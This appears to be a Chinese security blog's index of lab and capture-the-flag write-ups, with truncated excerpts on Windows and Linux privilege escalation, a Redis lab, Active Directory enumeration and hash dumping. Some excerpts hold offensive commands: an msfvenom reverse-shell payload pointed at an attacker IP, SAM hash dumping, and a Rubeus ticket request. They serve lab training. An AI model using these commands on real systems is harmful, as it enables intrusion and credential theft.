zhyann
Granny WebDAV文件上传漏洞 churrasco权限提升
简介GrannyDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.15 Windows 1. 信息收集收集受害者服务详情nmap -p- -T5 -n -vvv -oA Granny -noscript 10.10.10.15IIS 6.0...
使用自动化脚本实现Linux信息收集工作
1. 推荐步骤1. 在攻击端(如Kali主机)架设和启动一个Web服务器(或其他服务),其目的是把这些自动化脚本(工具)传输到靶标2. 在目标系统的受限shell下,去做以下工作:2.1 改变当前目录到一...
文件查找 locate命令
在文件系统上查找符合条件的文件文件查找:locate,find ·非实时查找(数据库查找):locate ·实时查找:find1. locatelocate查询系统上预建的文件索引数据库/var/lib/mlocate/mloc...
红日靶场7.1 Redis渗透复习与环境变量提权
环境攻击者IP 192.168.1.129web1 Ubuntu外网IP 192.168.1.128 信息收集arp-scan -I eth1 -l找到目标主机IP为192.168.1.128nmap -T5 -A -p- -n -vvv -noscript 192.168.1.12880,81端口开放 ...
实验
1. 获取一个Meterpreter shellmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.192.128 LPORT=3333 -f exe -o reverse.exe 2. 在Kali使用handler模块建立监听use exploit/multi/hand...
Linux查看哪个服务或者应用在运行
查看有哪些服务在运行ps aux查看进程ps aux | grep mysqlps aux | moreps -elftop动态查看进程cat /etc/services 查看服务文件 cat /etc/services | grep ssh 哪些服务以root用户运行,这些服...
Dumping Hashes & Crack Hashes
账户文件sam的位置%SystemRoot%\system32\config\SAM对应的注册表HKLM\SAM 1. 获取密码hash我们先获取SYSTEM权限的meterpreter 方法一:hashdump 方法二:pwdumphttps://github.com/Seabreg/pw...
Active Directory Introduction and Enumeration 2
环境Active Directory Enumeration – Enumeration Using Legacy Windows Tools – VM Group 1IP:192.168.169.70-76 首先连接192.168.169.75 Windows11环境xfreerdp /u:stephanie /d:corp.co...
Objective 20
任务• 利用 dollarcorp.moneycorp.local 上的 DA 权限,获取对 eurocorp.local 林的 DC 上的 SharedwithDCorp 共享的访问权限。 C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:63662...